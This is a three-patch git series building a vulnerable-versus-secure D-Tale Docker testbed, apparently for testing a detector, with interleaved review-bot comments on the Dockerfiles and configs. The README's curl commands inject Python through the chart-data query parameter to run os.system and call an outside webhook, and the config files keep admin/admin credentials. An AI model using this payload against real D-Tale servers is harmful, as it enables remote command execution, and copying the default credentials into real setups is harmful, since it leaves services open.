From f72a82c3976b0f23920416e110b29d83c490d279 Mon Sep 17 00:00:00 2001
From: VickyTheViking
Date: Tue, 5 Aug 2025 00:13:48 +0400
Subject: [PATCH 1/3] dtable query method code injection
---
dtale/CVE-2024-9016/README.md | 29 ++++++++++++++
dtale/CVE-2024-9016/Secure/Dockerfile | 14 +++++++
dtale/CVE-2024-9016/Secure/config.ini | 46 +++++++++++++++++++++++
dtale/CVE-2024-9016/Vulnerable/Dockerfile | 14 +++++++
dtale/CVE-2024-9016/Vulnerable/config.ini | 46 +++++++++++++++++++++++
5 files changed, 149 insertions(+)
create mode 100644 dtale/CVE-2024-9016/README.md
create mode 100644 dtale/CVE-2024-9016/Secure/Dockerfile
create mode 100644 dtale/CVE-2024-9016/Secure/config.ini
create mode 100644 dtale/CVE-2024-9016/Vulnerable/Dockerfile
create mode 100644 dtale/CVE-2024-9016/Vulnerable/config.ini
diff --git a/dtale/CVE-2024-9016/README.md b/dtale/CVE-2024-9016/README.md
new file mode 100644
index 00000000..38aa710c
--- /dev/null
+++ b/dtale/CVE-2024-9016/README.md
@@ -0,0 +1,29 @@
+# setup Secure instance of D-Tale to CVE-2024-9016
+```bash
+cd Secure/
+docker build -t dtale-cve-2024-9016-secure .
+docker run --rm --name dtalesecure -p 40000:40000 dtale-cve-2024-9016-secure
+```
+
+
+# setup Vulenrable instance of D-Tale to CVE-2024-9016
+```bash
+cd Vulnerable/
+docker build -t dtale-cve-2024-9016 .
+docker run --rm --name dtale-vulnerable -p 40000:40000 dtale-cve-2024-9016
+```
+now use the following command to exploit the vulnerability
+```bash
+# upload sample data
+curl 'http://127.0.0.1:40000/dtale/upload' \
+ -X POST \
+ -H 'Content-Type: multipart/form-data; boundary=----geckoformboundaryb38fffc548bd5dad82328985c3f223d4' \
+ --data-binary \
+ $'------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="simple-dtale-data.csv"; filename="simple-dtale-data.csv"\r\nContent-Type: text/csv\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="header"\r\n\r\ntrue\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separatorType"\r\n\r\ncomma\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separator"\r\n\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4--\r\n'
+ # response: 200 OK, body: {"data_id":"1","success":true}
+
+
+# replace https://webhook with your webhook URL
+curl -v 'http://127.0.0.1:40000/dtale/chart-data/1?query=%40pd.core.frame.com.builtins.__import__%28%22os%22%29.system%28%22%22%22curl%20https://webhook%20%23%22%22%22%29'
+# response: 200 OK, body: {"error":"'Series' object has no attribute 'columns....
+```
\ No newline at end of file
diff --git a/dtale/CVE-2024-9016/Secure/Dockerfile b/dtale/CVE-2024-9016/Secure/Dockerfile
new file mode 100644
index 00000000..b7788110
--- /dev/null
+++ b/dtale/CVE-2024-9016/Secure/Dockerfile
@@ -0,0 +1,14 @@
+FROM python:3.7
+LABEL cve="CVE-2024-9016-secure" \
+ status="secure" \
+ description="Secured version D-Tale instance for CVE-2024-9016"
+
+WORKDIR /app
+
+RUN pip install dtale==3.13.1
+RUN pip install dash_daq==0.5.0
+
+COPY config.ini /config.ini
+
+EXPOSE 40000
+CMD ["bash", "-c", "DTALE_CONFIG=/config.ini dtale --host 0.0.0.0 --port 40000"]
\ No newline at end of file
diff --git a/dtale/CVE-2024-9016/Secure/config.ini b/dtale/CVE-2024-9016/Secure/config.ini
new file mode 100644
index 00000000..fd88bce1
--- /dev/null
+++ b/dtale/CVE-2024-9016/Secure/config.ini
@@ -0,0 +1,46 @@
+
+[app]
+theme = light
+github_fork = False
+hide_shutdown = False
+pin_menu = False
+language = en
+max_column_width = 100
+main_title = My App
+main_title_font = Arial
+query_engine = python
+hide_header_editor = False
+lock_header_menu = False
+hide_header_menu = False
+hide_main_menu = False
+hide_column_menus = False
+enable_custom_filters = False
+enable_web_uploads = False
+
+[charts]
+scatter_points = 15000
+3d_points = 40000
+
+[show]
+host = localhost
+port = 8080
+reaper_on = True
+open_browser = False
+ignore_duplicate = True
+allow_cell_edits = True
+inplace = False
+drop_index = False
+precision = 6
+show_columns = a,b
+hide_columns = c
+column_formats = {"a": {"fmt": {"html": true}}}
+sort = a|ASC
+locked = a,b
+column_edit_options = {"a": ["foo", "bar", "baz"]}
+auto_hide_empty_columns = False
+highlight_filter = False
+
+[auth]
+active = False
+username = admin
+password = admin
\ No newline at end of file
diff --git a/dtale/CVE-2024-9016/Vulnerable/Dockerfile b/dtale/CVE-2024-9016/Vulnerable/Dockerfile
new file mode 100644
index 00000000..f7ec1bf3
--- /dev/null
+++ b/dtale/CVE-2024-9016/Vulnerable/Dockerfile
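Review bot: The image labelled `status="secure"` pins the same `dtale==3.13.1` as Vulnerable/Dockerfile further down in this patch, so the only thing separating the two is the copied config.ini, and the Dockerfile does not say so. A comment above the `COPY` line such as `# Same package version as the vulnerable image; the hardening is in config.ini (custom filters and web uploads off)` would make that dependency visible. Both Dockerfiles here, and vulnerable_dtale/Dockerfile in patch 3, also have no `USER` line, so the server that is meant to receive a command-execution payload runs as root inside the container. Adding `RUN useradd --system --uid 10001 dtale` and `USER dtale` before `CMD` would contain that.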
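Review bot: The `[auth]` section of this secure profile keeps `active = False` next to `username = admin` / `password = admin`, so the instance described as secure is still reachable without a login and carries a default credential pair that would take effect as soon as auth is switched on. The only lines that separate it from Vulnerable/config.ini in this patch are `enable_custom_filters = False` and `enable_web_uploads = False`. If the profile is meant to harden only the query and upload features, a comment above `[app]` saying so would make the boundary explicit; otherwise set `active = True` with a non-default password. The `[show]` values `host = localhost` and `port = 8080` also disagree with the `--host 0.0.0.0 --port 40000` in the Dockerfile `CMD`; presumably the command-line flags win, which deserves a one-line comment.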
@@ -0,0 +1,14 @@
+FROM python:3.7
+LABEL cve="CVE-2024-9016" \
+ status="vulnerable" \
+ description="Intentionally vulnerable D-Tale instance for CVE-2024-9016"
+
+WORKDIR /app
+
+RUN pip install dtale==3.13.1
+RUN pip install dash_daq==0.5.0
+
+COPY config.ini /config.ini
+
+EXPOSE 40000
+CMD ["bash", "-c", "DTALE_CONFIG=/config.ini dtale --host 0.0.0.0 --port 40000"]
\ No newline at end of file
diff --git a/dtale/CVE-2024-9016/Vulnerable/config.ini b/dtale/CVE-2024-9016/Vulnerable/config.ini
new file mode 100644
index 00000000..ee4afce8
--- /dev/null
+++ b/dtale/CVE-2024-9016/Vulnerable/config.ini
@@ -0,0 +1,46 @@
+
+[app]
+theme = light
+github_fork = False
+hide_shutdown = False
+pin_menu = False
+language = en
+max_column_width = 100
+main_title = My App
+main_title_font = Arial
+query_engine = python
+hide_header_editor = False
+lock_header_menu = False
+hide_header_menu = False
+hide_main_menu = False
+hide_column_menus = False
+enable_custom_filters = True
+enable_web_uploads = True
+
+[charts]
+scatter_points = 15000
+3d_points = 40000
+
+[show]
+host = localhost
+port = 8080
+reaper_on = True
+open_browser = False
+ignore_duplicate = True
+allow_cell_edits = True
+inplace = False
+drop_index = False
+precision = 6
+show_columns = a,b
+hide_columns = c
+column_formats = {"a": {"fmt": {"html": true}}}
+sort = a|ASC
+locked = a,b
+column_edit_options = {"a": ["foo", "bar", "baz"]}
+auto_hide_empty_columns = False
+highlight_filter = False
+
+[auth]
+active = False
+username = admin
+password = admin
\ No newline at end of file
From 7f8d7aec278d8d675d8df961b43253764e051f76 Mon Sep 17 00:00:00 2001
From: VickyTheViking
Date: Tue, 5 Aug 2025 15:22:41 +0400
Subject: [PATCH 2/3] update CVE to exposed UI as the CVE is rejected
---
dtale/CVE-2024-9016/Secure/config.ini | 46 -------------------
dtale/CVE-2024-9016/Vulnerable/Dockerfile | 14 ------
.../Secure => exposed_ui}/Dockerfile | 5 +-
dtale/{CVE-2024-9016 => exposed_ui}/README.md | 16 ++-----
.../Vulnerable => exposed_ui}/config.ini | 0
5 files changed, 5 insertions(+), 76 deletions(-)
delete mode 100644 dtale/CVE-2024-9016/Secure/config.ini
delete mode 100644 dtale/CVE-2024-9016/Vulnerable/Dockerfile
rename dtale/{CVE-2024-9016/Secure => exposed_ui}/Dockerfile (53%)
rename dtale/{CVE-2024-9016 => exposed_ui}/README.md (75%)
rename dtale/{CVE-2024-9016/Vulnerable => exposed_ui}/config.ini (100%)
diff --git a/dtale/CVE-2024-9016/Secure/config.ini b/dtale/CVE-2024-9016/Secure/config.ini
deleted file mode 100644
index fd88bce1..00000000
--- a/dtale/CVE-2024-9016/Secure/config.ini
+++ /dev/null
@@ -1,46 +0,0 @@
-
-[app]
-theme = light
-github_fork = False
-hide_shutdown = False
-pin_menu = False
-language = en
-max_column_width = 100
-main_title = My App
-main_title_font = Arial
-query_engine = python
-hide_header_editor = False
-lock_header_menu = False
-hide_header_menu = False
-hide_main_menu = False
-hide_column_menus = False
-enable_custom_filters = False
-enable_web_uploads = False
-
-[charts]
-scatter_points = 15000
-3d_points = 40000
-
-[show]
-host = localhost
-port = 8080
-reaper_on = True
-open_browser = False
-ignore_duplicate = True
-allow_cell_edits = True
-inplace = False
-drop_index = False
-precision = 6
-show_columns = a,b
-hide_columns = c
-column_formats = {"a": {"fmt": {"html": true}}}
-sort = a|ASC
-locked = a,b
-column_edit_options = {"a": ["foo", "bar", "baz"]}
-auto_hide_empty_columns = False
-highlight_filter = False
-
-[auth]
-active = False
-username = admin
-password = admin
\ No newline at end of file
diff --git a/dtale/CVE-2024-9016/Vulnerable/Dockerfile b/dtale/CVE-2024-9016/Vulnerable/Dockerfile deleted file mode 100644 index f7ec1bf3..00000000 --- a/dtale/CVE-2024-9016/Vulnerable/Dockerfile +++ /dev/null @@ -1,14 +0,0 @@ -FROM python:3.7 -LABEL cve="CVE-2024-9016" \ - status="vulnerable" \ - description="Intentionally vulnerable D-Tale instance for CVE-2024-9016" - -WORKDIR /app - -RUN pip install dtale==3.13.1 -RUN pip install dash_daq==0.5.0 - -COPY config.ini /config.ini - -EXPOSE 40000 -CMD ["bash", "-c", "DTALE_CONFIG=/config.ini dtale --host 0.0.0.0 --port 40000"] \ No newline at end of file diff --git a/dtale/CVE-2024-9016/Secure/Dockerfile b/dtale/exposed_ui/Dockerfile similarity index 53% rename from dtale/CVE-2024-9016/Secure/Dockerfile rename to dtale/exposed_ui/Dockerfile index b7788110..100ea2b8 100644 --- a/dtale/CVE-2024-9016/Secure/Dockerfile +++ b/dtale/exposed_ui/Dockerfile @@ -1,11 +1,8 @@ FROM python:3.7 -LABEL cve="CVE-2024-9016-secure" \ - status="secure" \ - description="Secured version D-Tale instance for CVE-2024-9016" WORKDIR /app -RUN pip install dtale==3.13.1 +RUN pip install dtale==3.18.2 RUN pip install dash_daq==0.5.0 COPY config.ini /config.ini diff --git a/dtale/CVE-2024-9016/README.md b/dtale/exposed_ui/README.md similarity index 75% rename from dtale/CVE-2024-9016/README.md rename to dtale/exposed_ui/README.md index 38aa710c..82d962c7 100644 --- a/dtale/CVE-2024-9016/README.md +++ b/dtale/exposed_ui/README.md 
@@ -1,16 +1,8 @@ -# setup Secure instance of D-Tale to CVE-2024-9016 -```bash -cd Secure/ -docker build -t dtale-cve-2024-9016-secure . -docker run --rm --name dtalesecure -p 40000:40000 dtale-cve-2024-9016-secure -``` - - -# setup Vulenrable instance of D-Tale to CVE-2024-9016 +# setup a D-Tale inance without need of authentication ```bash cd Vulnerable/ -docker build -t dtale-cve-2024-9016 . -docker run --rm --name dtale-vulnerable -p 40000:40000 dtale-cve-2024-9016 +docker build -t dtale-expose-ui . +docker run --rm --name dtale-vulnerable -p 40000:40000 dtale-expose-ui ``` now use the following command to exploit the vulnerability ```bash @@ -24,6 +16,6 @@ curl 'http://127.0.0.1:40000/dtale/upload' \ # replace https://webhook with your webhook URL -curl -v 'http://127.0.0.1:40000/dtale/chart-data/1?query=%40pd.core.frame.com.builtins.__import__%28%22os%22%29.system%28%22%22%22curl%20https://webhook%20%23%22%22%22%29' +curl -v 'http://127.0.0.1:40000/dtale/chart-data/1?query=%40pd.core.frame.com.builtins.__import__%28%22os%22%29.system%28%22%22%22curl%20https://webhook.site/fdda6d40-04ad-44d9-922c-d5c6e2359330%20%23%22%22%22%29' # response: 200 OK, body: {"error":"'Series' object has no attribute 'columns.... ``` \ No newline at end of file diff --git a/dtale/CVE-2024-9016/Vulnerable/config.ini b/dtale/exposed_ui/config.ini similarity index 100% rename from dtale/CVE-2024-9016/Vulnerable/config.ini rename to dtale/exposed_ui/config.ini From cb19912f59102ce26d457b6c3bb11a013dab89aa Mon Sep 17 00:00:00 2001 
From: VickyTheViking
Date: Sun, 5 Oct 2025 15:45:38 +0400
Subject: [PATCH 3/3] secure instance is added, fix exploit commands
---
dtale/exposed_ui/README.md | 25 ++++++----
.../exposed_ui/{ => secure_dtale}/Dockerfile | 2 +-
dtale/exposed_ui/secure_dtale/config.ini | 46 +++++++++++++++++++
dtale/exposed_ui/vulnerable_dtale/Dockerfile | 11 +++++
.../{ => vulnerable_dtale}/config.ini | 0
5 files changed, 74 insertions(+), 10 deletions(-)
rename dtale/exposed_ui/{ => secure_dtale}/Dockerfile (92%)
create mode 100644 dtale/exposed_ui/secure_dtale/config.ini
create mode 100644 dtale/exposed_ui/vulnerable_dtale/Dockerfile
rename dtale/exposed_ui/{ => vulnerable_dtale}/config.ini (100%)
diff --git a/dtale/exposed_ui/README.md b/dtale/exposed_ui/README.md
index 82d962c7..0f41b301 100644
--- a/dtale/exposed_ui/README.md
+++ b/dtale/exposed_ui/README.md
@@ -1,21 +1,28 @@ -# setup a D-Tale inance without need of authentication +# Setup a D-Tale instance without needing of authentication(insecure) ```bash -cd Vulnerable/ +cd vulnerable_dtale docker build -t dtale-expose-ui . docker run --rm --name dtale-vulnerable -p 40000:40000 dtale-expose-ui ``` -now use the following command to exploit the vulnerability +# Setup a D-Tale instance with authentication enabled (secure) +```bash +cd secure_dtale +docker build -t dtale-secure . +docker run --rm --name dtale-secure -p 40000:40000 dtale-secure +``` +Now use the following command to exploit the vulnerability ```bash # upload sample data -curl 'http://127.0.0.1:40000/dtale/upload' \ +curl -i 'http://127.0.0.1:40000/dtale/upload' \ -X POST \ - -H 'Content-Type: multipart/form-data; boundary=----geckoformboundaryb38fffc548bd5dad82328985c3f223d4' \ + -H 'Content-Type: multipart/form-data; boundary=-' \ --data-binary \ - $'------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="simple-dtale-data.csv"; filename="simple-dtale-data.csv"\r\nContent-Type: text/csv\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="header"\r\n\r\ntrue\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separatorType"\r\n\r\ncomma\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4\r\nContent-Disposition: form-data; name="separator"\r\n\r\n\r\n------geckoformboundaryb38fffc548bd5dad82328985c3f223d4--\r\n' - # response: 200 OK, body: {"data_id":"1","success":true} - + $'---\nContent-Disposition: form-data; name="data.csv"; filename="data.csv"\nContent-Type: text/csv\n\ntest,data\n\n---\nContent-Disposition: form-data; name="header"\n\ntrue\n---\nContent-Disposition: form-data; name="separatorType"\n\ncomma\n---\nContent-Disposition: form-data; name="separator"\n\n-----\n' + # response: 200 OK, body: {"data_id":"a number","success":true} # replace 
https://webhook with your webhook URL -curl -v 'http://127.0.0.1:40000/dtale/chart-data/1?query=%40pd.core.frame.com.builtins.__import__%28%22os%22%29.system%28%22%22%22curl%20https://webhook.site/fdda6d40-04ad-44d9-922c-d5c6e2359330%20%23%22%22%22%29' +curl -i -G \ + --data-urlencode 'query=@pd.core.frame.com.builtins.__import__("os").system("""curl https://webhook.site/ #""")' \ + 'http://127.0.0.1:40000/dtale/chart-data/1' # response: 200 OK, body: {"error":"'Series' object has no attribute 'columns.... ``` \ No newline at end of file diff --git a/dtale/exposed_ui/Dockerfile b/dtale/exposed_ui/secure_dtale/Dockerfile similarity index 92% rename from dtale/exposed_ui/Dockerfile rename to dtale/exposed_ui/secure_dtale/Dockerfile index 100ea2b8..cf2375af 100644 --- a/dtale/exposed_ui/Dockerfile +++ b/dtale/exposed_ui/secure_dtale/Dockerfile @@ -1,4 +1,4 @@ -FROM python:3.7 +FROM python:3.10 WORKDIR /app diff --git a/dtale/exposed_ui/secure_dtale/config.ini b/dtale/exposed_ui/secure_dtale/config.ini new file mode 100644 index 00000000..ff7e7019 --- /dev/null +++ b/dtale/exposed_ui/secure_dtale/config.ini 
@@ -0,0 +1,46 @@
+
+[app]
+theme = light
+github_fork = False
+hide_shutdown = False
+pin_menu = False
+language = en
+max_column_width = 100
+main_title = My App
+main_title_font = Arial
+query_engine = python
+hide_header_editor = False
+lock_header_menu = False
+hide_header_menu = False
+hide_main_menu = False
+hide_column_menus = False
+enable_custom_filters = True
+enable_web_uploads = True
+
+[charts]
+scatter_points = 15000
+3d_points = 40000
+
+[show]
+host = localhost
+port = 8080
+reaper_on = True
+open_browser = False
+ignore_duplicate = True
+allow_cell_edits = True
+inplace = False
+drop_index = False
+precision = 6
+show_columns = a,b
+hide_columns = c
+column_formats = {"a": {"fmt": {"html": true}}}
+sort = a|ASC
+locked = a,b
+column_edit_options = {"a": ["foo", "bar", "baz"]}
+auto_hide_empty_columns = False
+highlight_filter = False
+
+[auth]
+active = True
+username = admin
+password = admin
\ No newline at end of file
diff --git a/dtale/exposed_ui/vulnerable_dtale/Dockerfile b/dtale/exposed_ui/vulnerable_dtale/Dockerfile
new file mode 100644
index 00000000..cf2375af
--- /dev/null
+++ b/dtale/exposed_ui/vulnerable_dtale/Dockerfile
@@ -0,0 +1,11 @@
+FROM python:3.10
+
+WORKDIR /app
+
+RUN pip install dtale==3.18.2
+RUN pip install dash_daq==0.5.0
+
+COPY config.ini /config.ini
+
+EXPOSE 40000
+CMD ["bash", "-c", "DTALE_CONFIG=/config.ini dtale --host 0.0.0.0 --port 40000"]
\ No newline at end of file
diff --git a/dtale/exposed_ui/config.ini b/dtale/exposed_ui/vulnerable_dtale/config.ini
similarity index 100%
rename from dtale/exposed_ui/config.ini
rename to dtale/exposed_ui/vulnerable_dtale/config.ini
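Review bot: `active = True` is paired with `username = admin` and `password = admin`, so the profile presented as secure is protected by a credential pair that is a first guess, while `enable_custom_filters = True` and `enable_web_uploads = True` keep the query and upload features open to whoever logs in. For a testbed whose purpose is to show that a detector stays quiet on a login-protected instance this may be sufficient, but then the README should state that the password is a placeholder. A stronger baseline is a long random value instead of `admin` (for example `password = <generated-per-deployment>`), with both `enable_*` flags set to `False` unless the test needs them.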
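Review bot: Nothing in this new Dockerfile marks the image as deliberately unauthenticated: the `LABEL` block that carried `status="vulnerable"` was dropped in patch 2, and going by the blob id `cf2375af` in both headers the file is byte-identical to secure_dtale/Dockerfile, so the two images cannot be told apart with `docker inspect`. Restoring a label such as `LABEL status="vulnerable" description="Intentionally unauthenticated D-Tale instance"` makes an accidental deployment easier to spot. The `bash -c` wrapper in `CMD` exists only to set one variable; `ENV DTALE_CONFIG=/config.ini` followed by `CMD ["dtale", "--host", "0.0.0.0", "--port", "40000"]` does the same without a shell in the process chain.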